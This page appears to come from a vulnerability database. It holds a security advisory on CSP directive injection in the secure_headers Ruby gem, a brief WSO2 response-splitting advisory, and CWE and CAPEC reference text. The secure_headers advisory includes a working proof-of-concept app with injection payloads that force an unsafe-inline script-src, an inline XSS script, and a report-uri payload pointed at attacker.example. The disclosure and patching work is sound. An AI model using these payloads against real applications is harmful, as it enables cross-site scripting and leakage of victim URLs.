"details": "## Summary\n\n`secure_headers` builds the `Content-Security-Policy` value by stitching every configured directive together with `; ` separators. Three directive builders (`build_sandbox_list_directive`, `build_media_type_list_directive`, `build_report_to_directive`) interpolate caller-supplied strings into that value without scrubbing `;`, `\\r`, or `\\n`.\n\nWhen an application forwards untrusted input into `SecureHeaders.override_content_security_policy_directives` (or `append_\u2026`) for `:sandbox`, `:plugin_types`, or `:report_to`, an attacker can embed a literal `;` and inject an arbitrary CSP directive into the header value. Because `:sandbox` and `:plugin_types` both sort alphabetically before `:script_src` in `BODY_DIRECTIVES`, the injected `script-src` lands earlier in the header and wins under the [CSP first-occurrence rule](https://www.w3.org/TR/CSP3/#parse-serialized-policy), defeating the application\u0027s real `script-src`. End result: an `\u0027unsafe-inline\u0027 *` policy is forced for inline `\u003cscript\u003e` despite the configured strict CSP, giving full XSS reachability anywhere reflected or stored content meets one of these three sinks.\n\nAn existing `;`/`\\n` scrub is already present in the source-list builder (`build_source_list_directive`), but the three sibling builders here never received the same treatment and still emit caller bytes verbatim into the CSP value.\n\n## Impact\n\nAlthough piping untrusted input into CSP directives is generally discouraged, applications that do so for one of the three uncovered directives turn that endpoint into an XSS sink with an effective `*` `\u0027unsafe-inline\u0027` `script-src`, even though the global config says `script_src: %w(\u0027self\u0027)`. The same primitive can also be used to point `report-to` / `report-uri` at attacker infrastructure to silently siphon CSP violation reports \u2014 which include the violated URL, blocked-uri, source-file, line-number and a sample-snippet, useful for fingerprinting and for harvesting victim-internal URLs.\n\nThe global default CSP set in `Configuration.default` is supposed to be a backstop: even if a controller appends a single risky value, the strict `script-src` should remain the first match. This bug breaks that property by letting the appended value redefine the policy header upstream of the legitimate `script-src`.\n\n## Affected\n\n- **Package:** `secure_headers` (RubyGems)\n- **Vulnerable versions:** `\u003c= 7.2.0`\n- **Patched version:** `7.3.0`\n\nApplications that set `:sandbox`, `:plugin_types`, or `:report_to` only from static configuration (no per-request or per-tenant input) are not exploitable and need only the version bump. Applications that pipe any user-controlled value into one of those three directives via the per-controller override APIs are exploitable and should both upgrade and audit those code paths.\n\n## Mitigations / Workarounds\n\nUntil upgrading to **7.3.0**, sanitize any user-controlled input before passing it to:\n\n- `SecureHeaders.override_content_security_policy_directives`\n- `SecureHeaders.append_content_security_policy_directives`\n- `SecureHeaders.use_content_security_policy_named_append`\n\nfor `:sandbox`, `:plugin_types`, or `:report_to`. Reject or strip `;`, `\\r`, and `\\n` from values destined for these directives before they reach the gem.\n\n## Vulnerable code\n\nThree sibling builders all join an attacker-controllable value into the CSP header value with no `;` / `\\r` / `\\n` scrubbing.\n\n- [`content_security_policy.rb#L72-L93`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L72-L93) \u2014 `build_sandbox_list_directive`:\n\n```ruby\nelsif sandbox_list \u0026\u0026 sandbox_list.any?\n [\n symbol_to_hyphen_case(directive),\n sandbox_list.uniq\n ].join(\" \")\nend\n```\n\n- [`content_security_policy.rb#L95-L103`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L95-L103) \u2014 `build_media_type_list_directive` (same pattern, for `plugin-types`).\n- [`content_security_policy.rb#L105-L110`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L105-L110) \u2014 `build_report_to_directive`:\n\n```ruby\ndef build_report_to_directive(directive)\n return unless endpoint_name = @config.directive_value(directive)\n if endpoint_name \u0026\u0026 endpoint_name.is_a?(String) \u0026\u0026 !endpoint_name.empty?\n [symbol_to_hyphen_case(directive), endpoint_name].join(\" \")\n end\nend\n```\n\nFor comparison, [`content_security_policy.rb#L117-L129`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L117-L129) shows the source-list builder that already performs the scrub the three above are missing.\n\nValidation also does not catch it:\n\n- [`policy_management.rb#L361-L371`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L361-L371) \u2014 `validate_sandbox_expression!` only checks `v.start_with?(\"allow-\")`, so `\"allow-scripts allow-same-origin; script-src \u0027unsafe-inline\u0027 *\"` passes.\n- [`policy_management.rb#L376-L385`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L376-L385) \u2014 `validate_media_type_expression!` uses `/\\A.+\\/.+\\z/`; `.` matches `;` and `\u0027`, so `\"application/x-foo; script-src \u0027unsafe-inline\u0027 *\"` passes.\n- [`policy_management.rb#L410-L417`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L410-L417) \u2014 `validate_report_to_endpoint_expression!` only checks `String` + non-empty.\n\n## Reachable\n\nThe three sinks are reached by the documented public override APIs in [`lib/secure_headers.rb#L61-L106`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers.rb#L61-L106) \u2014 `override_content_security_policy_directives`, `append_content_security_policy_directives`, and `use_content_security_policy_named_append`. These are the documented per-controller hooks Rails apps use to vary CSP per request (e.g. allowing an iframe domain that a user just configured, sandboxing a per-tenant subdocument, or wiring up a per-tenant reporting endpoint).\n\nConcrete reachable shapes:\n\n1. Multi-tenant SaaS persisting a tenant-chosen iframe sandbox policy and replaying it via `override_content_security_policy_directives(sandbox: [tenant.sandbox_tokens])`.\n2. Document / PDF viewer that allows tenants to whitelist a custom MIME via `plugin_types: [tenant.allowed_mime]`.\n3. Reporting integration that lets the operator name the active reporting group through an admin UI and forwards it via `report_to: params[:report_group]`.\n\nIn all three patterns, a string field that the app expects to be a single token (`allow-forms`, `application/pdf`, `default`) is the injection point.\n\n## Proof of concept\n\nPinned reproduction against a minimal Rack app on `secure_headers 7.2.0`, `rack 3.2.6`, `rackup 2.3.1`, `webrick 1.9.2`. Browser verification uses headless Chromium.\n\nInstall (Bundler):\n\n```ruby\n# Gemfile\nsource \"https://rubygems.org\"\ngem \"secure_headers\", \"= 7.2.0\"\ngem \"rack\", \"= 3.2.6\"\ngem \"rackup\", \"= 2.3.1\"\ngem \"webrick\", \"= 1.9.2\"\n```\n\n```bash\nbundle install\n```\n\nDriver (`poc_e2e.rb`):\n\n```ruby\nrequire \"rack\"\nrequire \"webrick\"\nrequire \"rackup\"\nrequire \"rackup/handler/webrick\"\nrequire \"secure_headers\"\n\nSecureHeaders::Configuration.default do |c|\n c.csp = {default_src: %w(\u0027self\u0027), script_src: %w(\u0027self\u0027), style_src: %w(\u0027self\u0027)}\nend\n\nINLINE_XSS = \"\u003cscript\u003edocument.body.appendChild(Object.assign(\" \\\n \"document.createElement(\u0027div\u0027),{id:\u0027pwn\u0027,innerText:\" \\\n \"\u0027XSS-EXECUTED via \u0027+location.pathname}));\u003c/script\u003e\"\n\nclass App\n def call(env)\n req = Rack::Request.new(env)\n case req.path_info\n when \"/sandbox\" # Vector A\n SecureHeaders.override_content_security_policy_directives(req,\n sandbox: [\"allow-scripts allow-same-origin; script-src \u0027unsafe-inline\u0027 *\"])\n when \"/plugin\" # Vector B\n SecureHeaders.override_content_security_policy_directives(req,\n plugin_types: [\"application/x-foo; script-src \u0027unsafe-inline\u0027 *\"])\n when \"/report\" # Vector C (report-uri exfil)\n SecureHeaders.override_content_security_policy_directives(req,\n report_to: \"default; report-uri https://attacker.example/leak\")\n when \"/control\" # Negative \u2014 same payload on a source_list directive\n SecureHeaders.override_content_security_policy_directives(req,\n frame_src: [\"\u0027self\u0027\", \"evil.example; script-src \u0027unsafe-inline\u0027 *\"])\n end\n body = \"\u003c!doctype html\u003e#{INLINE_XSS}\"\n [200, {\"content-type\"=\u003e\"text/html\"}.merge(SecureHeaders.header_hash_for(req)), [body]]\n end\nend\n\nRackup::Handler::WEBrick.run(\n Rack::Builder.new { use SecureHeaders::Middleware; run App.new },\n Host: \"127.0.0.1\", Port: 14567, AccessLog: [], Logger: WEBrick::Log.new(nil, 0))\n```\n\nRun:\n\n```bash\nbundle exec ruby poc_e2e.rb\n```\n\n### End-to-end reproduction against `secure_headers 7.2.0`\n\nServer-side observation (`curl -s -D - http://127.0.0.1:14567/\u003cpath\u003e`):\n\n```\nGET /sandbox -\u003e content-security-policy:\n default-src \u0027self\u0027; sandbox allow-scripts allow-same-origin;\n script-src \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n\nGET /plugin -\u003e content-security-policy:\n default-src \u0027self\u0027; plugin-types application/x-foo;\n script-src \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n\nGET /report -\u003e content-security-policy:\n default-src \u0027self\u0027; script-src \u0027self\u0027; style-src \u0027self\u0027;\n report-to default; report-uri https://attacker.example/leak\n\nGET /control -\u003e content-security-policy:\n default-src \u0027self\u0027; frame-src \u0027self\u0027 evil.example script-src\n \u0027unsafe-inline\u0027 *; script-src \u0027self\u0027; style-src \u0027self\u0027\n```\n\nBrowser verification (headless Chromium, `--dump-dom`, grep for the injected `id=\"pwn\"` element which is only present if the inline `\u003cscript\u003e` actually ran):\n\n```\nGET /sandbox -\u003e pwn element PRESENT (XSS executed, injected script-src wins)\nGET /plugin -\u003e pwn element PRESENT (XSS executed, injected script-src wins)\nGET /report -\u003e pwn element absent (this vector enables report-uri exfil,\n not script execution by itself)\nGET /control -\u003e pwn element absent (existing scrub on the source-list\n builder rewrites ; -\u003e space, so the\n legitimate `script-src \u0027self\u0027` is\n still the first match)\n```\n\nPatched-build verification: applying the patch and re-running the same three vectors flips `/sandbox` and `/plugin` to \"pwn element absent\". The injected `;` is replaced with a space, so the trailing `script-src \u0027unsafe-inline\u0027 *` collapses into the parent directive\u0027s value list instead of becoming a sibling directive, and the legitimate `script-src \u0027self\u0027` stays the first `script-src` the parser encounters.\n\n## Patch\n\nShipped in **7.3.0** as a private helper that scrubs `;`, `\\r`, and `\\n` from every directive value, applied uniformly across the three previously-uncovered builders and the source-list builder.\n\nSketch of the shipped change in `lib/secure_headers/headers/content_security_policy.rb`:\n\n```ruby\nDIRECTIVE_INJECTION_REGEX = /[\\n\\r;]/.freeze\n\ndef scrub_directive_value(directive, value)\n str = value.to_s\n if str =~ DIRECTIVE_INJECTION_REGEX\n Kernel.warn(\"#{directive} contains a #{$~[0].inspect} in #{str.inspect} which will raise an error in future versions. It has been replaced with a blank space.\")\n str.gsub(DIRECTIVE_INJECTION_REGEX, \" \")\n else\n str\n end\nend\n```\n\nThe helper is invoked from each builder against the **joined** directive value (not per-token), so a single Kernel.warn is emitted per directive regardless of how many offending bytes the input contains. The same helper now also wraps the existing source-list scrub.\n\nSee the merged fix PR for the full patch and tests.\n\n## Credit\n\nReported by [@tonghuaroot](https://github.com/tonghuaroot).\n\n## Resources\n\n- CVE-2020-5217 \u2014 prior `secure_headers` advisory for the same bug class on `build_source_list_directive` (the 2020 fix that motivated the helper this advisory extends).\n- [W3C CSP Level 3 \u2014 Parse a serialized CSP](https://www.w3.org/TR/CSP3/#parse-serialized-policy) \u2014 defines the first-occurrence rule that makes the alphabetical-ordering exploit work.\n- [RFC 7230 \u00a73.2.4 \u2014 Field parsing](https://www.rfc-editor.org/rfc/rfc7230#section-3.2.4) \u2014 context for why bare `\\r` / `\\n` in HTTP header values are unsafe regardless of directive separator semantics.",
"id": "GHSA-rqq5-2gf9-4w4q",
"modified": "2026-07-10T20:37:15Z",
"published": "2026-07-10T20:37:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/github/secure_headers/security/advisories/GHSA-rqq5-2gf9-4w4q"
},
{
"type": "PACKAGE",
"url": "https://github.com/github/secure_headers"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2026-54163.yml"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord/SearchResults?query=CVE-2026-54163"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when given untrusted input"
}
GHSA-RVPC-W57P-Q95F
Vulnerability from github – Published: 2022-02-09 22:35 – Updated: 2021-04-07 21:38Netty in WSO2 transport-http before v6.3.1 is vulnerable to HTTP Response Splitting due to HTTP Header validation being disabled.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.wso2.transport.http:org.wso2.transport.http.netty"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-10797"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-07T21:38:25Z",
"nvd_published_at": "2020-02-19T19:15:00Z",
"severity": "MODERATE"
},
"details": "Netty in WSO2 transport-http before v6.3.1 is vulnerable to HTTP Response Splitting due to HTTP Header validation being disabled.",
"id": "GHSA-rvpc-w57p-q95f",
"modified": "2021-04-07T21:38:25Z",
"published": "2022-02-09T22:35:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10797"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWSO2TRANSPORTHTTP-548944"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "HTTP Response Splitting in WSO2 transport-http"
}
Mitigation
Strategy: Input Validation
Construct HTTP headers very carefully, avoiding the use of non-validated input data.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. If an input does not strictly conform to specifications, reject it or transform it into something that conforms.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-30
Strategy: Output Encoding
Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
CAPEC-105: HTTP Request Splitting
An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).
See CanPrecede relationships for possible consequences.
CAPEC-31: Accessing/Intercepting/Modifying HTTP Cookies
This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie's content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.
CAPEC-34: HTTP Response Splitting
An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.
See CanPrecede relationships for possible consequences.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.